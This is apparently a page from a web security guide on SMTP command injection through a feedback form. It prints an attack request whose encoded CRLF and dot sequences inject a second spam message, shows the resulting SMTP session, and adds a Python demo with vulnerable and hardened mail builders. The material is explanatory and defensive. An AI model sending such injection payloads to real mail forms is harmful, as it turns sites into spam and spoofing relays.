Web application security - the fast guide 1.1 | Page 147
Chapter 7 - Attack execution (3)
The main difference from the header-manipulation approach described earlier is that the injected line breaks now land inside the SMTP conversation itself, so the attacker can inject whole SMTP commands rather than just extra mail headers. A second MAIL FROM command starts a completely new message whose envelope, headers and body are entirely under the attacker's control.
As an example, suppose the attacker submits the following request, taking advantage of the application's missing input validation (the %0d%0a sequences are URL-encoded CRLF line breaks and %2e is an encoded dot, which on a line by itself is the SMTP end-of-data marker):
POST /feedback.php HTTP/1.1
Host: vulnerableApp.com
Content-Length: 266

[email protected]&Subject=Site+feedback%0d%0aany message%0d%0a%2e%0d%0aMAIL+FROM:+mail@attacker-viagra.com%0d%0aRCPT+TO:[email protected]%0d%0aDATA%0d%0aFrom:+[email protected]%0d%0aTo:+[email protected]%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=spam message contents
The resulting client side of the SMTP conversation (the lines the application writes to the mail server, after URL decoding) will be:
MAIL FROM: [email protected]
RCPT TO: feedback@vulnerableApp.com
DATA
From: [email protected]
To: [email protected]
Subject: Site feedback
any message
.
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
From: [email protected]
To: [email protected]
Subject: Cheap V1AGR4
Blah
.
spam message contents
.
It is quite clear that two messages are sent: the first is the legitimate feedback message and the second is entirely controlled by the attacker. The application's own remaining output (the Message field and its final terminating dot) only arrives after the attacker's end-of-data marker, so the mail server is back in command mode by then and simply rejects those lines as unrecognised commands; both messages have already been accepted.
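The following script is an added example, not code from the book or from the feedback application it describes. It reconstructs the attack above end to end: a naive builder pastes the form fields straight into the SMTP session the way the vulnerable feedback script does, a tiny model of the server side of SMTP (command mode versus DATA mode, ending on a lone dot) shows that the injected input yields two accepted messages plus two rejected stray lines, and a hardened builder shows the two checks that close the hole: refuse CR/LF in any value that goes into a header or command line, and dot-stuff the body so a user-supplied line consisting of a single dot cannot end DATA early. The form field names (Email, Subject, Message) and every address other than feedback@vulnerableApp.com and mail@attacker-viagra.com are assumptions, since the page does not show them.

```python
import re
import urllib.parse

RECIPIENT = "feedback@vulnerableApp.com"  # the feedback mailbox used on the page

# Constructed sample request body (URL-encoded form fields) mirroring the
# attacker's POST above. Field names and the example.* addresses are assumed.
ATTACKER_FORM_BODY = (
    "Email=victim%40example.org"
    "&Subject=Site+feedback%0d%0aany+message%0d%0a%2e%0d%0a"
    "MAIL+FROM:+mail@attacker-viagra.com%0d%0a"
    "RCPT+TO:+target@example.net%0d%0aDATA%0d%0a"
    "From:+mail@attacker-viagra.com%0d%0a"
    "To:+target@example.net%0d%0a"
    "Subject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a"
    "&Message=spam+message+contents"
)
# A constructed benign submission whose body contains a line that is just ".".
BENIGN_FORM_BODY = (
    "Email=alice%40example.org&Subject=Site+feedback"
    "&Message=line+one%0d%0a.%0d%0aline+three"
)


def _fields(form_body):
    f = urllib.parse.parse_qs(form_body, keep_blank_values=True)
    return f["Email"][0], f["Subject"][0], f["Message"][0]


def _stream(sender, subject, body):
    # The application's fixed SMTP template; values are interpolated verbatim.
    return (f"MAIL FROM: {sender}\r\nRCPT TO: {RECIPIENT}\r\nDATA\r\n"
            f"From: {sender}\r\nTo: {RECIPIENT}\r\nSubject: {subject}\r\n"
            f"\r\n{body}\r\n.\r\n")


def build_client_stream_vulnerable(form_body):
    """What the page's feedback script effectively does: every field is pasted
    into the SMTP session unchecked, so a CRLF inside a field becomes new
    SMTP lines (new commands once the injected '.' has ended DATA)."""
    return _stream(*_fields(form_body))


ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def build_client_stream_hardened(form_body):
    """Same template with the two checks that stop the injection."""
    sender, subject, body = _fields(form_body)
    if not ADDR_RE.fullmatch(sender):
        raise ValueError("sender is not a plain e-mail address")
    if "\r" in subject or "\n" in subject:
        raise ValueError("line break in a header field")
    # The body may legitimately span lines: normalise line endings to CRLF and
    # dot-stuff (RFC 5321 section 4.5.2) so a line that is just "." cannot
    # terminate DATA early; the server strips the extra leading dot again.
    lines = re.split(r"\r\n|\r|\n", body)
    body = "\r\n".join("." + ln if ln.startswith(".") else ln for ln in lines)
    return _stream(sender, subject, body)


def hardened_rejects(form_body):
    try:
        build_client_stream_hardened(form_body)
    except ValueError:
        return True
    return False


def deliver(stream):
    """Minimal model of the server side of the session. In command mode each
    CRLF-terminated line is a command; after DATA, lines are message content
    until a line consisting of a single '.'. Returns (messages, rejected):
    the accepted messages and the lines a real server would answer with a
    500 'command unrecognized' error."""
    messages, rejected = [], []
    envelope, body, in_data = {}, [], False
    for line in stream.split("\r\n"):
        if in_data:
            if line == ".":
                messages.append({**envelope, "data": "\r\n".join(body)})
                envelope, body, in_data = {}, [], False
            else:
                body.append(line[1:] if line.startswith(".") else line)
            continue
        verb = line.split(":", 1)[0].split(" ", 1)[0].upper()
        if verb == "MAIL":
            envelope["mail_from"] = line.split(":", 1)[1].strip()
        elif verb == "RCPT":
            envelope["rcpt_to"] = line.split(":", 1)[1].strip()
        elif verb == "DATA":
            in_data = True
        elif line:
            rejected.append(line)
    return messages, rejected


if __name__ == "__main__":
    msgs, stray = deliver(build_client_stream_vulnerable(ATTACKER_FORM_BODY))
    print(f"vulnerable build: {len(msgs)} messages accepted, {len(stray)} stray lines rejected")
    for m in msgs:
        print(f"  MAIL FROM {m['mail_from']} -> RCPT TO {m['rcpt_to']}")
    print("hardened build rejects attacker input:", hardened_rejects(ATTACKER_FORM_BODY))
```

Rejecting CR and LF in anything that lands on a command or header line is the essential check; a format check on the sender address alone is not enough, because here the payload travels in the Subject field, which has no natural format to validate against.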